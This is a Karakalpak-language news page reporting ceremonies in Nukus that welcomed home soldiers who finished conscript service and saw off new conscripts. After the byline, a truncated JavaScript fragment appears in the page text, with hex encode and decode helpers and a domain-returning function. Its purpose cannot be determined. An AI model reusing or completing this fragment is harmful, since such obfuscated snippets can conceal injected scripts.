Еркин Қарақалпақстан Вести Каракалпакстана 21:50:27, 11.11.2019
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

ЎАТАНҒА ХЫЗМЕТ — ӘДИЎЛИ МИННЕТ

Бүгинги күнге келип Қураллы Күшлер қатарында хызмет етиў жасларымыз арасында мақтанышлы кәсипке айланып, олардың елимиз шегараларының қол қатылмаслығын, хал­қымыздың тыныш-татыў турмысын тәмийинлеўдей жуўапкерли хызметти ат­қарыўға бол­ған айрықша умтылыслары бәршемизди қуўандырады. Себеби, әскерий хызмет жасларымыз ушын тек ғана азаматлық ўазыйпа болып қалмас­тан, мәртебе ҳәм мақтанышқа айланбақта.

Жақында Өзбекистан Республикасы Президентиниң 2015-жыл 23-декабрьдеги «Өзбекистан Республикасы пуқараларының мүддетли әскерий хызметке гезектеги шақырыўы ҳәм белгиленген хызмет мүддетлерин өтеген әскерий хызметкерлерди Қураллы Күшлер резервине босатыў ҳаққында»ғы қарарына тийкарланып, республикамыздың барлық жерлеринде мүддетли хызметин өтеген әскерлерди күтип алыў ҳәм жасларды Қураллы Күшлер қатарына шығарып салыў илажлары өткерилип келинбекте.

Өткен жума ҳәм шемби күнлери Нөкис темир жол вокзалында мүддетли әскерий хызметин өтеген әскерлерди кең жәмийетшилик тәрепинен күтип алыў, ал, екшемби күни болса гезектеги мүддетли әскерий хызметке атланып атырған бир қатар жасларды салтанатлы узатып салыў кешеси болып өтти.

Мәресимде Қарақалпақстан Республикасы Қорғаныў ислери бо­йынша басқармасынан, Арқа-Батыс әскерий округинен, республика Ишки ислер министрлигинен, «Мәҳәлле» қайыр­қомлық-жәмийетлик фондынан, республикалық «Камалат» жаслар жәми­йетлик ҳәрекетинен қатнас­қан жуўапкер хызметкерлер, урыс ҳәм мийнет ветеранлары, сондай-ақ, бир топар шақырылыўшы жаслардың ата-аналары сөзге шығып, өзлериниң ел-халық алдындағы перзентлик ўазыйпасын атқарыўға атланып атырған жасларды қызғын қутлықлап, ҳақ жол ҳәм ай барып, аман келиўин тиледи.

— Ақлығымды әскерий хызметке шығарып салар екенмен, бул күнлерге, ғәрезсиз, тыныш ҳәм абадан елде жасап атырғаныма шүкирлик етемен. Әлбетте, бул мен сыяқлы бәрше ата-аналар ушын үлкен қуўаныш. Өмиримиз даўамшыларының камалға жеткенлигин көрип, көзлеримиздеги қуўаныш жасларын да жасыра алмай атырмыз,-дейди нөкисли шақырылыўшы Тимур Қалхоразовтың  кемпир апасы, 85 жасар Қалжан Үббиниязова.

Илаж даўамында жаслар­ға бир қатар шөлкемлердиң саўғалары тапсырылып, көркем-өнер ғайраткерлери тәрепинен шөлкемлестирилген концерт бағдарламасы қойып берилди.

Р.АРЗИЕВ,

арнаўлы хабаршымыз.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF